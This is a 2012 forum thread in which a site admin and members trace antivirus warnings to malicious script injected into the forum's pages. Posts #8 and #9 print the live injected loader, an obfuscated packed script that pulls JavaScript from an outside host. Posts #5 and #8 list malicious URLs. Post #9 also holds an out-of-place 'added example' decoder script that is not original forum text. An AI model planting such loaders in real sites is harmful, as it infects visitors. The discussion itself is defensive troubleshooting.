Post #1, Feb 6 2012, 03:03 PM. Member title: Obsessive. Group: Established Members, Posts: 240, Joined: 21-September 11, Member No.: 17,519, Gender: Male.
This is something I got a few hours ago while trying to get to the forums:
[screenshot not preserved]

Scary stuff!
Post #2, Feb 8 2012, 12:24 PM. Member title: 'Trouble Down Pit' now online! Group: Admin, Posts: 10,141, Joined: 22-February 03, From: Southern UK, Member No.: 1, Gender: Male.
Thanks. I monitor all changes to pages on my domain, so if anything has got through that then it's at a low level that I don't have access to. I've asked my hosting company to run a full scan of my domains to see if they can spot where an exploit has been inserted.
--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog, The Matazone Shop, The Matazone Blog, The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Post #3, Feb 16 2012, 04:39 PM. Member title: Advice for the young at heart. Group: Moderators, Posts: 2,705, Joined: 26-February 03, From: Essex, UK, Member No.: 33, Gender: Male.
I also just had an infection warning pop up from the Avast webshield as I visited the forums main page (.../forums).
Unfortunately, I missed the details, and for some reason the log is empty, so I can't be much more help than that :/
Post #4, Feb 27 2012, 08:06 PM. Member title: 'Trouble Down Pit' now online! Group: Admin, Posts: 10,141, Joined: 22-February 03, From: Southern UK, Member No.: 1, Gender: Male.
Thanks - I've bumped the host admins again.
Post #5, Mar 2 2012, 12:59 PM. Member title: Advice for the young at heart. Group: Moderators, Posts: 2,705, Joined: 26-February 03, From: Essex, UK, Member No.: 33, Gender: Male.
Avast picked up this today upon opening the main forum page:
```
Object: http://wtgrvwohvgusoire.nl.ai/main.php?page=300c6519e5f2b0af
Infection: JS:Downloader-gen@bhv [Expl]
Process: C:\Program Files\Internet Explorer\iexplore.exe
```
Post #6, Mar 17 2012, 04:00 PM. Member title: 'Trouble Down Pit' now online! Group: Admin, Posts: 10,141, Joined: 22-February 03, From: Southern UK, Member No.: 1, Gender: Male.
Thanks... But I'm really not sure what to do. We've scanned the entire site directory and the database, so there isn't anywhere else to look.

I do occasionally get people trying SQL injection hacks on my database - this generates an error log in which the SQL can remain and this can be used as an active script if the hacker knows where the error log will be stored. I've got file monitoring set up on my whole site that tells me when one of those logs is created and I go and delete them as soon as I can (less than 24 hours) and during that time no further alterations are made to my site (they would be picked up by the scanner). I don't think there is any way that these logs could be generating the problem you're seeing, but it's the only thing I can think of.

If you get another one, could you please open up the source code for the page you are viewing (this is right-click 'View page source' in Firefox, I don't remember it in IE) and do a search (Ctrl+F) to find where the code is being generated on the page - I'm wondering if perhaps someone has got a link to an avatar where the avatar page has been hacked, or something weird like that... Or perhaps someone has created a username that is read as code by the page and tries to execute a script... I'm really stumped for ideas and I'll need your help on this because I've never seen the error.

If you can't find the problem, could you save the file and send it to my mata@ [this domain] address please and I'll see if there's anything in there that lets me work out what's going on. Thanks!
Post #7, Mar 17 2012, 08:41 PM. Member title: Obsessive. Group: Established Members, Posts: 240, Joined: 21-September 11, Member No.: 17,519, Gender: Male.
> Thanks... But I'm really not sure what to do. We've scanned the entire site directory and the database, so there isn't anywhere else to look.
>
> I do occasionally get people trying SQL injection hacks on my database - this generates an error log in which the SQL can remain and this can be used as an active script if the hacker knows where the error log will be stored. I've got file monitoring set up on my whole site that tells me when one of those logs is created and I go and delete them as soon as I can (less than 24 hours) and during that time no further alterations are made to my site (they would be picked up by the scanner). I don't think there is any way that these logs could be generating the problem you're seeing, but it's the only thing I can think of.
>
> If you get another one, could you please open up the source code for the page you are viewing (this is right-click 'View page source' in Firefox, I don't remember it in IE) and do a search (Ctrl+F) to find where the code is being generated on the page - I'm wondering if perhaps someone has got a link to an avatar where the avatar page has been hacked, or something weird like that... Or perhaps someone has created a username that is read as code by the page and tries to execute a script... I'm really stumped for ideas and I'll need your help on this because I've never seen the error.
>
> If you can't find the problem, could you save the file and send it to my mata@ [this domain] address please and I'll see if there's anything in there that lets me work out what's going on. Thanks!

It hasn't happened to me since then, maybe some temporary XSS?
Post #8, Apr 16 2012, 07:13 AM. Member title: Advice for the young at heart. Group: Moderators, Posts: 2,705, Joined: 26-February 03, From: Essex, UK, Member No.: 33, Gender: Male.
This came up this morning on the main forum page:
```
URL: http://laykz.tetuku.com/images.php?t
Process: file://C:\Program Files (x86)\Internet E...
Infection: al
```

Unfortunately I clicked away before I viewed the source. I did go 'back' to the page, but I'm not sure whether it would show it up or not. I took a look through the source but didn't find anything unusual except a batch of URL code which, when decoded, is a javascript. It doesn't look malicious though, but does have a website reference which I don't see in any advertising or anything? It's probably entirely normal (as I don't really have any real experience with javascript beyond 'Hello World') but I'll post the info here anyway. I reloaded the page and the code is still there. I only really query it because it looks unusual as it's in URL encoded text. *shrugs*

It was at line 2024:

```html
<script type="text/javascript">document.write(unescape('<script%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%72%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%20%63%2E%74%6F%53%74%72%69%6E%67%28%61%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%63%2D%2D%29%72%5B%65%28%63%29%5D%3D%6B%5B%63%5D%7C%7C%65%28%63%29%3B%6B%3D%5B%66%75%6E%63%74%69%6F%6E%28%65%29%7B%72%65%74%75%72%6E%20%72%5B%65%5D%7D%5D%3B%65%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%63%3D%31%7D%3B%77%68%69%6C%65%28%63%2D%2D%29%69%66%28%6B%5B%63%5D%29%70%3D%70%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%65%28%63%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%6B%5B%63%5D%29%3B%72%65%74%75%72%6E%20%70%7D%28%27%31%2E%32%28%5C%27%3C%30%20%33%3D%22%34%2F%35%22%20%36%3D%22%37%3A%2F%2F%38%2E%39%2E%61%2F%62%2F%63%2F%64%2E%65%22%3E%3C%2F%30%3E%5C%27%29%27%2C%31%35%2C%31%35%2C%27%73%63%72%69%70%74%7C%64%6F%63%75%6D%65%6E%74%7C%77%72%69%74%65%7C%74%79%70%65%7C%74%65%78%74%7C%6A%61%76%61%73%63%72%69%70%74%7C%73%72%63%7C%68%74%74%70%7C%67%6F%62%75%79%6C%6F%63%61%6C%7C%63%6F%6D%7C%61%75%7C%63%6F%6D%70%6F%6E%65%6E%74%73%7C%63%6F%6D%5F%63%6E%74%7C%63%6E%74%7C%6A%73%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3C%2F%73%63%72%69%70%74%3E'))</script>
```

Decoded it reads:

```html
<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1.2(\'<0 3="4/5" 6="7://8.9.a/b/c/d.e"></0>\')',15,15,'script|document|write|type|text|javascript|src|http|gobuylocal|com|au|components|com_cnt|cnt|js'.split('|'),0,{}))</script>
```

I don't really know what gobuylocal stuff is? Again, it doesn't look overly malicious, but I just don't get why it is there?
Post #9, Apr 17 2012, 08:50 AM. Member title: Has been kidnapped by gerbils and forced to post on here repeatedly. Group: Established Members, Posts: 1,088, Joined: 18-September 03, From: London, Member No.: 606, Gender: Female.
It's evaluating some obfuscated code.

Looks like it injects another script into the page.

```html
<script type="text/javascript">
eval(
  function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}(
    '1.2(\'<0 3="4/5" 6="7://8.9.a/b/c/d.e"></0>\')',
    15,
    15,
    'script|document|write|type|text|javascript|src|http|gobuylocal|com|au|components|com_cnt|cnt|js'.split('|'), // this doesn't look good.
    0,
    {}
  )
)
</script>
```

--------------------
Kung fu fighting from 25th April 2010
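The two posts above show the injected script in its served form (a `document.write(unescape('%XX...'))` wrapper around a p,a,c,k,e,r packer) and the unpacked form. The following is an added example, not code from this thread or from the forum software, written as a defender's triage script for a saved copy of the page source: it undoes both layers statically, with no `eval`, recovers the external script URL the payload pulls in, and reports the line number of each indicator, which answers the "where on the page is it being generated" question asked in post #6. The function names, the short hand-encoded `SAMPLE_ESCAPED` string and the `example.com` allowlist entry are assumptions made for this example; `SAMPLE_PACKED` is the decoded layer as quoted in post #8.

```javascript
// Added example (not from the thread): static decoder for the two-layer obfuscation above.
// Layer 1: document.write(unescape('%XX...')). Layer 2: eval(function(p,a,c,k,e,r){...}(...)).
// Nothing is eval'd; the packer is reversed by rebuilding its token dictionary.
'use strict';

// Sample taken from post #8 (decoded layer), held as a raw string so the \\w+ and \' escapes
// are exactly what the browser received.
const SAMPLE_PACKED = String.raw`<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1.2(\'<0 3="4/5" 6="7://8.9.a/b/c/d.e"></0>\')',15,15,'script|document|write|type|text|javascript|src|http|gobuylocal|com|au|components|com_cnt|cnt|js'.split('|'),0,{}))</script>`;

// Constructed sample of the outer layer only, percent-encoded by hand for this example.
const SAMPLE_ESCAPED = "<script type=\"text/javascript\">document.write(unescape('%3Cb%3Ehi%3C%2Fb%3E'))</script>";

// Equivalent of the legacy unescape() for %XX sequences (the only form the sample uses).
function percentDecode(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Undo JS single-quoted string escaping; \' and \\ are the escapes the sample uses.
function unquote(s) {
  return s.replace(/\\(.)/g, '$1');
}

// Layer 1: return the decoded unescape() payload if present, else the input unchanged.
function stripUnescapeLayer(html) {
  const m = html.match(/document\.write\(unescape\('((?:[^'\\]|\\.)*)'\)\)/);
  return m ? percentDecode(unquote(m[1])) : html;
}

// Layer 2: the packer's call site is }('p', a, c, 'k'.split('|'), ...). Tokens in p are
// base-a numerals indexing the word list k; this handles the e = c.toString(a) variant.
const PACKER_RE = /\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\s*\.split\('\|'\)/;

function unpackPacker(js) {
  const m = js.match(PACKER_RE);
  if (!m) return null;
  const p = unquote(m[1]);
  const base = parseInt(m[2], 10);
  const count = parseInt(m[3], 10);
  const words = unquote(m[4]).split('|');
  return p.replace(/\b\w+\b/g, (tok) => {
    const idx = parseInt(tok, base);
    // Only a whole-token base-`base` numeral below `count` is a dictionary key.
    if (Number.isNaN(idx) || idx >= count || idx.toString(base) !== tok) return tok;
    return words[idx] || tok;
  });
}

// External script sources referenced by a fragment of HTML.
function findScriptSrcs(html) {
  return [...html.matchAll(/<script[^>]*\ssrc="([^"]+)"/gi)].map((m) => m[1]);
}

// Full pipeline: both decoded layers plus the script URLs the final layer loads.
function decodeInjectedScript(html) {
  const layer1 = stripUnescapeLayer(html);
  const unpacked = unpackPacker(layer1);
  return { layer1, unpacked, scriptSrcs: findScriptSrcs(unpacked || layer1) };
}

// Triage over a saved page source: 1-based line of each indicator. Hosts in
// allowedHosts (the site's own) are not reported.
function findSuspiciousScripts(source, allowedHosts = []) {
  const hits = [];
  source.split('\n').forEach((line, i) => {
    if (/document\.write\(unescape\(/.test(line)) hits.push({ line: i + 1, why: 'document.write(unescape(...))' });
    if (/eval\(function\(p,a,c,k,e,r\)/.test(line)) hits.push({ line: i + 1, why: 'p,a,c,k,e,r packer' });
    for (const src of findScriptSrcs(line)) {
      const host = src.replace(/^https?:\/\//i, '').split('/')[0];
      if (!allowedHosts.includes(host)) hits.push({ line: i + 1, why: `external script from ${host}` });
    }
  });
  return hits;
}

const result = decodeInjectedScript(SAMPLE_PACKED);
console.log(result.unpacked);   // the document.write('<script ... src="http://gobuylocal.com.au/..."></script>') call
console.log(result.scriptSrcs); // [ 'http://gobuylocal.com.au/components/com_cnt/cnt.js' ]
console.log(findSuspiciousScripts(SAMPLE_PACKED));
```

To use it on a real capture, read the saved source with `fs.readFileSync(path, 'utf8')`, pass it to `findSuspiciousScripts` with the forum's own hostname in `allowedHosts`, and feed any flagged line to `decodeInjectedScript`. The unpacker never executes the payload, which matters because the packed string is attacker-controlled; it only reverses the dictionary substitution the packer performs, so it is safe to run on the file the admin asked for.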
Post #10, Apr 27 2012, 06:29 PM. Member title: 'Trouble Down Pit' now online! Group: Admin, Posts: 10,141, Joined: 22-February 03, From: Southern UK, Member No.: 1, Gender: Male.
Sorry, I didn't see this message when you first posted it.
I think what's happening is that someone is using an injection method through the error logging procedure of the forums. When the log is created, it records the dodgy code, then somehow that code can be run. Naturally, I delete the log as soon as I see it, but that's not instantly.

When I get back from holiday I think I'm going to have to stump up a couple of hundred euros to get someone to update the forum software and probably transfer all of the data onto a new open-source forum. It's a heck of a job, but the modern software will be more secure against this kind of thing as well as being easier to update... It's just going to cost a lot.
Post #11, Apr 27 2012, 07:32 PM. Member title: Obsessive. Group: Established Members, Posts: 240, Joined: 21-September 11, Member No.: 17,519, Gender: Male.
> Sorry, I didn't see this message when you first posted it.
>
> I think what's happening is that someone is using an injection method through the error logging procedure of the forums. When the log is created, it records the dodgy code, then somehow that code can be run. Naturally, I delete the log as soon as I see it, but that's not instantly.
>
> When I get back from holiday I think I'm going to have to stump up a couple of hundred euros to get someone to update the forum software and probably transfer all of the data onto a new open-source forum. It's a heck of a job, but the modern software will be more secure against this kind of thing as well as being easier to update... It's just going to cost a lot.

Are you sure you need to dish out that kind of money? I'm not sure how the forum is set up but I'd imagine it involves a database. Couldn't you use the current database when trying out new forum software?
Post #12, Apr 28 2012, 08:27 AM. Member title: Has been kidnapped by gerbils and forced to post on here repeatedly. Group: Established Members, Posts: 1,088, Joined: 18-September 03, From: London, Member No.: 606, Gender: Female.
You need to import everything into the new format though, which is going to be difficult if there isn't already a built in tool for that.
You could just archive the current forum and start over, but everyone would need to create new accounts.
Post #13, May 11 2012, 09:38 AM. Member title: 'Trouble Down Pit' now online! Group: Admin, Posts: 10,141, Joined: 22-February 03, From: Southern UK, Member No.: 1, Gender: Male.
Ouch. No, I'd rather not archive everything.
Yes, the problem comes in that there aren't automatic updaters or converters. If I get it all moved to modern software then I should be able to do that in the future, but this time I'll have to bite the bullet and get someone to do it the hard way.